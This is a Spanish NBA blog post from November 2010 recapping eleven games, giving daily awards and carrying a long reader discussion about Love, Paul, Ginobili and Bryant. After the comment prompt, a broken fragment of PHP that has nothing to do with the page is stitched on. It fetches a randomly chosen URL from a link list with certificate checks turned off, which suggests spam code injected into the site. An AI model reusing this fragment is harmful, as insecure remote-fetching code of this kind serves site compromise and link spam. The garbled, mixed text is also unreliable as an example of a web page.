La Crónica (24/11/2010)

25 de November de 2010 por TheDeerHunter

Nada menos que 11 partidos de mega-jornada entre semana.

Los Spurs se libraron de milagro de una inesperada derrota contra los Wolves a pesar de que Love y Milicic se comieron con patatas a Duncan y compañía (113-109). Falló en esta ocasión Beasley, sin embargo, y a Minnesotta se le terminó la gasolina en el último cuarto, donde los Spurs a rueda de Ginobili les endosaron 35-24 para forzar el tiempo extra y ahí rematarles. 13-1 para las espuelas, 12 de racha y hablando de Parker para el MVP.

Los Hornets, por su parte, se llevaron la segunda derrota consecutiva en Salt Lake, en un duelo espectacular CP3 vs D.Williams. Los Jazz mostraron más profundidad a pear de la horrible actuación de Kirilenko. Millsap y Al Jefferson marcaron la diferencia en el 87-105 final .

En Oklahoma también pudimos disfrutar de un duelo estelar entre Dirk y Durantula. Los Mavs rompieron la buena racha de los Thunder con un Chandler que les está dando la vida al equipo de Carlisle (111-103).

Pasando a la zona noble del Este los Magic se resarcieron de la anterior paliza de los Heat (95-104). Se confirma que Vince estaba pasando problemas físicos y anoche fue impecablemente bien sustituido por Redick. Howard y Bass arrasaron la zona y los Heat solamente fueron su Big Three y gracias, porque se dieron el susto del mundo con un conato de lesión de espalda de Chris Bosh. Sólo les hubiera faltado eso.

Mientras los Celtics ganaron sufriendo a los Nets (83-89), con Shaq como en los buenos tiempos y los Bulls padecieron todavía más contra los Suns tras dos prórrogas (123-115).

Ojo, porque los Knicks ganaron su 5º consecutivo en Charlotte (99-95) y los Raptors su 4º ante los Sixers (90-106). Cleveland se deshizo de los Bucks con canasta in extremis de Mo (81-83)  y, finalmente, Memphis apalizó a Detroit (84-105) y los Rockets volvieron a ganar contra los Warriors (101-111).

PREMIOS

MVP: No solo por anotar 35 puntos, capturar 12 rebotes y repartir 7 asistencias. Derrick Rose merece también el MVP por anotar 2 tiros libres y empatar el partido a falta de 14 segundos dentro del tiempo regular, anotar una bandeja a aro pasado a falta de 0.1 segundos para el final de la primera prórroga para empatar de nuevo y anotar los 5 primeros puntos de los Bulls en la segunda prórroga. Simplemente decisivo.

Rookie: Si nos fijamos en la faceta anotadora hemos de destacar los 15 puntos de Wes Johnson. Y si nos fijamos en la reboteadora podemos nombrar a Greg Monroe, Larry Sanders o Landry Fields, todos con más de 7 rebotes. Hay para elegir.

Sorpresa: De Reggie Evans sabemos que no es un dechado de virtudes pero hay que reconocer que hace perfectamente su trabajo. Anoche fue una de las claves de la victoria de su equipo con 12 puntos y 22 rebotes. Otra fue Jose Calderon, que con la titularidad bajo el brazo recupera la confianza y juega sus mejores minutos. 16 puntos y 9 asistencias para el extremeño.

Decepción: Malísimo partido el de Brandon Jennings. 1 de 10 en tiro y sólo 3 puntos en 28 minutos de juego. Derrota inevitable de los Bucks, claro.

Esfuerzo en vano: Otro soberano esfuerzo de Kevin Love que se va al traste. 32 puntos y 22 rebotes no fueron suficiente para hacerse con la victoria ante el mismísmo Tim Duncan. Kevin Durant (32-11-5) y Tyrus Thomas (26-11-3) también tienen motivos para estar enfadados con el mundo.

Comenta

23 comentarios a esta entrada

  1. Moman dice:
    #1

    Vaya 5 partidos lleva Milicic, al final va a valer para la nba y los timberwolves no se van a comer su contrato como parecía, a no ser que su privilegiada cabeza lo estropee todo

      Citar

  2. Busky23 dice:
    #2

    Noche intensa,con muchos partidos para elegir,yo me quede con el Bulls-Suns…partidazo,es una gozada ver jugar a Derrick Rose,un jugon en toda regla que mejora año a año.
    Cositas destacables de la jornada: Miami,de mal en peor,Riley ya se esta preparando la pizarra,el duelo Paul-Deron resuelto en favor del de los Jazz que me esta pareciendo un equipo muy rocoso y regular,a diferencia de los Hornets que parece que se van desinflando poco a poco.
    Partidazos de dos viejos rockeros,25 puntazos para Shaq y 27 para Grant Hill,el que tuvo retuvo.
    Buena racha de victorias de los Knicks,Felton cada día me gusta mas,y como anécdota,Stat perdiendo su dorsal en pleno partido ( no había visto nunca una cosa igual).
    A día de hoy Kevin Love candidato numer one para hacerse con el MIP,rebotea como nadie,anota y hasta se atreve a jugarse un triple en el ultimo segundo…

      Citar

  3. sergio dice:
    #3

    Preguntas:

    – ¿Es Love el mejor PF del futuro?
    -¿Quien es mejor: Deron o Paul?
    -¿Que diferencia hay entre Dampier y Chandler+Haywood? (en millones)
    -¿Alguien sigue pensando en los Heat como alternativa?
    -¿Pueden ganar los Heat una serie a los Magic sin nadie que pare a Howard?
    -¿Dampier+Ilgauskas+Juwan Howard+Joel Anthony es menor que Dwight?
    -¿Es mas facil jugar en Boston o es que O’neal esta supermotivado?
    -¿Porque los Suns ponen en problemas a todo el mundo con las carencias que tienen?
    -¿En NY les salio todo mal en verano y todo esta saliendo bien en Regular?
    -¿Aportan mas Evans-Bargnani que Bosh-Bargnani?
    -¿Porque en Cleveland nunca sabes quien se va a salir y en Miami sabes que nadie va a aportar(fuera de los Three Amigos?
    -¿Porque se habla tanto de Parker como MVP si Ginobili lo merece tanto como el? ¿Es Manu el Iniesta del baloncesto? ¿Tiene mas o menos recursos tecnicos que Bryant?

      Citar

  4. Busky23 dice:
    #4

    Nadie en la historia del baloncesto ha tenido mas recursos técnicos que KB24 (se que es discutible pero es mi opinión),es como comparar a Jordan con Villacampa.

      Citar

  5. MagicJohnson32 dice:
    #5

    Sergio, añado a tu lista tres preguntas sobre los Pistons:

    ¿Os acordáis de aquella época en la que todos admirábamos a Joe Dumars como GM?
    ¿En qué leches están pensando él y Kuester?
    Hay equipos con peor balance, pero ¿existe alguno más deprimente que estos Pistons?

      Citar

  6. MagicJohnson32 dice:
    #6

    Hombre Busky23, más fan de Kobe que yo dudo que haya nadie, jeje, pero Manu es técnica pura. Como jugador no hay comparación pero en cuanto a técnica Ginóbili es de lo mejor que ha habido.

    Y por cierto, estoy de acuerdo con el apunte de Sergio sobre los méritos de Parker y Manu. El nivel de Ginóbili está siendo estratosférico y está siendo el líder de unos Spurs tremendos.

    Por cierto, sobre Love: lo que ha tenido que hacer este chico para que Rambis se dejase de tonterías ¿no? Me ponen de mala leche los entrenadores que intentan imponer decisiones por encima de toda lógica. Lo de Avery Johnson con Troy Murphy, por ejemplo…

      Citar

  7. -=TheKing=- dice:
    #7

    – – ¿Es Love el mejor PF del futuro? Millsap me gusta más pero de momento el rendimiento de Love le augura mejor futuro.
    -¿Quien es mejor: Deron o Paul? Para mí Deron ha demostrado más, pero creo que Paul es más técnico.
    -¿Alguien sigue pensando en los Heat como alternativa? Yo si se meten en play off….. apuesto que darán caña.
    -¿Pueden ganar los Heat una serie a los Magic sin nadie que pare a Howard? Howard en los momentos claves de play off siempre me ha decepcionado, no sé lo mismo cambia de ahora en adelante…..
    -¿Dampier+Ilgauskas+Juwan Howard+Joel Anthony es menor que Dwight? No lo sé
    -¿Es mas facil jugar en Boston o es que O’neal esta supermotivado? O’neal se encuentra arropado y jugando con ayudas que hace tiempo que no recibía, ten en cuenta que tienes el recuerdo de verlo mendigando por cleveland.
    -¿Porque los Suns ponen en problemas a todo el mundo con las carencias que tienen? Oh los Suns mi equipo preferido, simpre tan alegres y talentosos aunque tengan jugadores patateros. Si a Nash le consiguierán un buen center….. pero vamos que ponen en aprietos porque tienen un ataque muy fluido pero claro en rebotes y defensa dan pena, no se como Robin es tan irregular y tiene tan poca concentración.
    -¿En NY les salio todo mal en verano y todo esta saliendo bien en Regular? Y si consiguen a Carmelo….
    -¿Aportan mas Evans-Bargnani que Bosh-Bargnani? Bosh era quien se jugaba las bolas calientes y evans no, por tanto…..
    -¿Porque en Cleveland nunca sabes quien se va a salir y en Miami sabes que nadie va a aportar(fuera de los Three Amigos? Cleveland juega bien tiene un equipo limitado pero juego bien si Jaimison rindiera cómo en Washintong…….. Miami tiene un juego ofensivo saturado y defienden muy mal en conjunto sobre todo la pintura, todos los equipos que le han planteado un buen juego interior les han ganado.
    -¿Porque se habla tanto de Parker como MVP si Ginobili lo merece tanto como el?
    Para mi ginobilli es mejor, pero parquer con eso del divorcio está en boca de todos.
    ¿Es Manu el Iniesta del baloncesto? Iniesta es más técnico hahah ¿Tiene más o menos recursos técnicos que Bryant? Menos recursos pero tiene la casta Argentina y le hecha unos cojones impresionates, para mí puro corazón.

      Citar

  8. xapa_croack dice:
    #8

    Kevin Love ha hecho 2 partidos de 30-20 en los primeros 16 de la temporada; sólo lo habían hecho Olajuwon y Barkley en los últimos 25 años

      Citar

  9. sergio dice:
    #9

    Vale… lanzare otra pregunta… ha habido algun jugador aparte del actual Paul en tener mas de 10 asistencias y 3 robos con menos de 2,5 perdidas?

    Aunque este obviamente de acuerdo en que Bryant es muchisimo mejor jugador que Ginobili, este ultimo tiene mas recursos ofensivos. Por ejemplo, en el pase y en las penetraciones. Bryant es insuperable en el fade-away y en el juego de espaldas, pero lo que inventa Ginobili no se lo he visto a nadie

    http://www.youtube.com/watch?v=18o0mPTElBo
    http://www.youtube.com/watch?v=-QNqAP05bjU
    (<– "no ase falta desirrr nada mas" q diria schuster)

      Citar

  10. TheDeerHunter dice:
    #10

    – ¿Es Love el mejor PF del futuro? – De entrada no podemos descartar a Griffin. Está claro que Love está haciendo bestialidades, pero a mí me parece que el otro tiene a priori mejores condiciones para ser el nº1.
    -¿Quien es mejor: Deron o Paul? Para mí CP3 es un base mucho más puro. En ningún caso me atrevería a decir que Deron es mejor que Paul porque tenga una mayor orientación individual.
    -¿Que diferencia hay entre Dampier y Chandler+Haywood? (en millones) ¿En millones tirados o aprovechados? Ni Chandler ni Haywood son precisamente baratos, pero da la casualidad que con Chandler les ha tocado la lotería a los Mavs, de momento. No olvidemos que él era una patata caliente en Charlotte y en New Orleans.
    -¿Alguien sigue pensando en los Heat como alternativa? En un proyecto tan justitio lo que ha pasado con Miller y Haslem (los dos mejores después del big three) es un golpe muy duro. Yo creo que lo tienen muy jodido este año, pero un equipo con 3 monstruos como esos si llegan bien a playoffs pueden armar un cirio muy peligroso.
    -¿Pueden ganar los Heat una serie a los Magic sin nadie que pare a Howard? Pues sí, si Howard sólo lanza 8 tiros de promedio, por ejemplo. No estoy diciendo nada que no hayamos visto ya.
    -¿Dampier+Ilgauskas+Juwan Howard+Joel Anthony es menor que Dwight? No estoy tan seguro… Howard ya ha mostrado a veces debilidades cuando tiene que pegarse con 4 leñeros distintos.
    -¿Es mas facil jugar en Boston o es que O’neal esta supermotivado? O’neal está en una edad donde hay que facilitarle ciertas cosas… pero yo creo que sano no ha jugado tan sumamente mal como muchos aseguran estos últimos años. A mí, al menos, no me sorprende lo que está haciendo en Boston. Tampoco es algo monstruoso, ojo.
    -¿Porque los Suns ponen en problemas a todo el mundo con las carencias que tienen? Porque explotan sus virtudes, que son mayores que las carencias. Creo que el dúo Nash-Gentry no ofrece dudas ni fisuras.
    -¿En NY les salio todo mal en verano y todo esta saliendo bien en Regular? De todo bien… nada de nada. Yo sigo esperando a Randolph y me parece que me quedaré con las ganas. Eso sí, al menos ahora tiene algo de color la cosa… pero el calendario tampoco ha sido salvaje.
    -¿Aportan mas Evans-Bargnani que Bosh-Bargnani? Posiblemente sea más equilibrado… sobre todo si a Bargnani le da por jugar como podría hacerlo. Él año pasado ya pasó por algún momento dulce… que luego se diluyó, como siempre.
    -¿Porque en Cleveland nunca sabes quien se va a salir y en Miami sabes que nadie va a aportar(fuera de los Three Amigos? En un equipo mediocre como Cleveland tienen que tirar más del colectivo. Hay modelos y modelos… Valorar el modelo Heat en circunstancias adversas es como todo…
    -¿Porque se habla tanto de Parker como MVP si Ginobili lo merece tanto como el? ¿Es Manu el Iniesta del baloncesto? ¿Tiene mas o menos recursos tecnicos que Bryant? No estoy de acuerdo con ninguna. Ginobili está jugando francamente bien pero no al nivel de Parker (es perfectamente demostrable sólo con el Log de los partidos delante) Me parece que Manudo ha estado siempre bien considerado, pero no al nivel de Iniesta en el futbol… que es otro plano distinto. Kobe Bryant es el sumun de los recursos técnicos… por mucho que Manudo sea muy bueno en ese sentido.

      Citar

  11. TheDeerHunter dice:
    #11

    Partidos del mes de Noviembre (=12 Spurs invencibles)

    Parker: 34.9 min; 19.8 puntos (54,5%); 7.7 asis; 3.4 reb; 1.93 robos
    Manudo: 33.1 min; 20.8 puntos (46,7%); 4.9 asis: 3.4 reb; 1.86 robos

    Las diferencias son mínimas… pero las hay a favor de Parker. Con todo supongo que algo de razón tenéis pero el líder para mí es Parker ahora mismo.

      Citar

  12. sergio dice:
    #12

    Cuando digo que a NY le esta saliendo todo bien es porq uno de los rookies es la sorpresa del año, que Felton esta en valoración al nivel de Nash, Wall, Parker, Ellis o incluso Deron (diferencias de 2 puntos o menos, sin tener en cuenta el impacto real claro….), que Stoudamire no lo esta haciendo mal, que Chandler aporta bastante, que estan teniendo sus rachas de victorias y se nota que, por una vez, no se diluyen como azucarillos,…. Pero claro, yo ya dije que con todas esas cosas lo maximo a lo que aspiraban es a entrar en Playoffs… y en esas estan. Lo de Randolph no lo entiendo mucho la verdad… pero estando Gallinari, Chandler y Stoudamire esta la cosa apretadiya. Yo buscaria un trade por ahi con equipos con superpoblacion en puestos de 2 y 3 como Phoenix, Toronto o Detroit. Un 3-4 por un 2-3 no??

      Citar

  13. sergio dice:
    #13

    Solo han perdido un partido por mas 10 puntos.. a eso me referia a que parece que ahora no se dejan llevar

      Citar

  14. GreenPride dice:
    #14

    De anoche vi Celtics-Nets y Magic-Heat. Por los Celtics gran partido de O’Neal que parece rejuvenecido en Boston con un equipo que le arropa y sin gran responsabilidad personal. Los Celtics pierden una temporada a Delonte lesionado en la mano, lo que unido a que a Nate se le fue la mano con las faltas hizo que tuvieran que jugar muchos minutos con Marquis Daniels de base. A pesar de ello y gracias en parte a la flojera de los Nets consiguieron salvar el partido con Pierce al mando.
    El Magic-Heat dejó claro que a los Heat hoy día les falta bastante para ser un equipo puntero de la NBA. Para empezar cada vez que los coge un base en condiciones les hace un roto. Ayer Nelson batio su record de asistencias y antes Rondo, CP3 y Deron pasaron de 16 asistencias contra ellos. Además Wade no da una y LeBron y él no meten ni una a más de 4-5 metros del aro y los demás a parte del Big Three son de relleno lo que hace muy difícil que tengan un ataque fluido aunque Bosh empiece a despertar. Como además LeBron sube el balón pierde mucho de lo que podría hacer en ataque. Por los Magic gran partido de Brandon Bass, bien Dwight (menos en los tiros libres) y Reddick que ayudó en ataque aunque para mí sigue faltándoles algo.

      Citar

  15. Txusma dice:
    #15

    Manudo es el mejor en este aspecto. Ahora, la lista que has subido Sergio me da q la ha hecho un americano poniendo ese mate como su mejor jugada. A mi me flipan más la 10, la 5 o la 3.

      Citar

  16. TheDeerHunter dice:
    #16

    Creo que alguien que vota a Monta Ellis en lugar de Kobe Bryant para el all-star debería de estar automáticamente inhabilitado para esta discusión (porque se te ve el plumero, berraco!!!)

    No sólo voy a reiterar mi opinión ya conocida de que Kobe es el mejor de la historia en ese aspecto…

    Añado que, efectivamente los vídeos que ha añadido Sergio no reflejan precisamente la técnica de Manudo… y de paso, aportamos algo de luz al respecto de la técnica baloncestística:
    http://www.youtube.com/watch?v=4FpzQiERt8I&feature=related
    (ainsss, criaturassss….)

      Citar

  17. Scriers dice:
    #17

    – ¿Es Love el mejor PF del futuro? Pues… vamos a ver. Una cosa que tienen en común los nombres aquí sugeridos es que están en equipos con bajo nivel de exigencia. Tanto Love como Griffin son muy buenos, pero habrán de verse sometidos a mayor exigencia aún para ver hasta dónde pueden llegar. Yo a Millsap lo veo un peldaño debajo de estos dos primeros y un ejemplo de autosuperación, por poco debajo, eso sí.
    -¿Quien es mejor: Deron o Paul? Bueno, ya sabéis que me gustan más los bases puros. Es decir, prefiero a Paul, lo que no se es a quién elegiría en caso de tener que jugarme unos playoff, de momento, ninguno de los dos consiguió altas cotas, pero Deron tiene, corregirme si me equivoco, más presencia en Playoff, así que quizás lo eligiría por este aspecto.
    -¿Que diferencia hay entre Dampier y Chandler+Haywood? (en millones) Pues no lo sé, de los tres, el mejor es Chandler, que siempre me ha gustado como hace los Picks And Rolls, me parece verdaderamente bueno en eso. Sin lesiones de por medio, creo que no hay color.
    -¿Alguien sigue pensando en los Heat como alternativa? Pues debe pensarse, pero cuesta hacerlo. Ahora están en cuadro y no han encontrado ritmo de juego ni siquiera un plan específico en el campo, tienen que solucionar el tema del base, no desgastar en eso a Lebron, el tema del center, creo que les hace falta una especie de Evans o Wallace, y por lo demás, me sorprende el nulo rendimiento del resto de la plantilla, creí que iba a servir de extramotivación, pero no encuentran el pegamento. Yo no les daría chances este año.
    -¿Pueden ganar los Heat una serie a los Magic sin nadie que pare a Howard? Los Magic se han mostrado capaces de hacerlo tan mal que obvien a Howard en su plan de Playoff, así que todo es posible. Pero aún con esas, parecen mejores los Magic.
    -¿Dampier+Ilgauskas+Juwan Howard+Joel Anthony es menor que Dwight? Sí, son menores.
    -¿Es mas facil jugar en Boston o es que O’neal esta supermotivado? Es más fácil introducirse en un esquema ya hecho, que sufre mínimas variaciones y la que sufre son de calidad. El tipo de juego de los Celtics, con muchas asistencias y circulación de balón, le beneficia.
    -¿Porque los Suns ponen en problemas a todo el mundo con las carencias que tienen? Inexplicable. Y más teniendo a Turkoglu cargándose la extraña armonía. Funcionan porque su banquillo es más o menos fiable (si no es Warrick, es Dudley o Dragic o un cuarto) y porque Nash infunde un espíritu que no se ve, pero que existe. Creo que es una falta de respeto jugar con ese señor y no ser competitivo.
    -¿En NY les salio todo mal en verano y todo esta saliendo bien en Regular? Yo creo que el equipo está optimizado al 90%, es decir, casi al límite de sus posibilidades. Me sorprende que Stou esté tan bien y el nivel de Felton. Si siguen así a final de temporada habrá que darle la enhorabuena a alguien por conseguir lo que no se ha conseguido en años (eso sí, el nivel del este tiene mucho que ver). Por lo demás, muchos actores secundarios aportando mucho (Fields, Gallinari, Douglas, Walker…).
    -¿Aportan mas Evans-Bargnani que Bosh-Bargnani? En materia de Rebotes, solo Evans aporta más que los dos otros juntos. En materia de puntos, casi igual Bosh que Bargnani, pero en liderazgo… ay en liderazgo. En los partidos cerrados de Toronto se las juegan otros.
    -¿Porque en Cleveland nunca sabes quien se va a salir y en Miami sabes que nadie va a aportar(fuera de los Three Amigos? Porque son equipos que están mal, sin roles definidos (ni siquiera en el big three).
    -¿Porque se habla tanto de Parker como MVP si Ginobili lo merece tanto como el? ¿Es Manu el Iniesta del baloncesto? ¿Tiene mas o menos recursos tecnicos que Bryant? Yo creo que lo merece más Parker, solo que Ginobilli tiene una buenísima prensa. Eso sí, con todo merecimiento. El Iniesta del basket, pues, al menos en su país, anda por ahí (aunque no tiene ese momento único de gloria, claro). Bryant es intocable hoy día.

      Citar

  18. Scriers dice:
    #18

    Donde puse Walker en los Nicks, quise poner Chandler. Confundo los nombres.

      Citar

  19. wakefield dice:
    #19

    Nosotros los argentinos lo tenemos como mucho mas que el Iniesta del basket. Salvando las distancias quizá Iniesta este entre los mejores 10 del mundo y Ginobili nunca lo estuvo pero también es cierto que para el basket la figura de Ginobili: líder absoluto de un equipo campeón olímpico y un equipo subcampeon del mundo que hace 10 años que esta en la élite es mayor que la de Iniesta que hace dos años era solo un buen jugador y que en tres años no estará mas donde está ahora. Igualmente esta muy fuera de lugar una discusion basket-fútbol, miles son las diferencias, lo que hace que en España pueda aparecer otro Iniesta pero no les va a surgir otro Gasol tan fácil.
    Igualmente aun siendo argentino, Bryant es mas todo que Ginobili pero Ginobili merece ser mas reconocido aun con toda la prensa que tiene.

    Yo tambien vote a Monta por Kobe, los dos son insoportables pero qué lindo es ver a los Warriors.

      Citar

  20. Txusma dice:
    #20

    Era por cambiar un pelín. No os aburre ver siempre a los mismos? 😉

      Citar

  21. TheDeerHunter dice:
    #21

    Aquí en España siento que le tenemos a Ginobili una gran simpatía y una admiración máxima. Te diré que opino que le falta un MVP de las finales que le sobra a Duncan… y después de haber vibrado de aquella manera cuando eliminásteis por primera vez a los USA nos fastidió a todos el robazo de Serbia en el mundobasket.
    Es curioso, porque yo a quien nunca he soportado es a los Spurs… pero nunca he tenido especial animadversión ni a Duncan ni a Manudo.

    Sobre la votación… era un comentario en plan broma hacia Txusma. Respeto lo que vota cada cual.

      Citar

  22. Txusma dice:
    #22

    Evidentemente me lo había tomado en plan broma. Tampoco me duele afirmar que Kobes es 200000 veces mejor que Monta y casi que cualquiera.

      Citar

  23. MagicJohnson32 dice:
    #23

    Pues Deer lo diría en broma, pero votar a Monta por encima de Bryant es de un mal gusto intolerable.

    Ya hablaremos tú y yo, ya…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>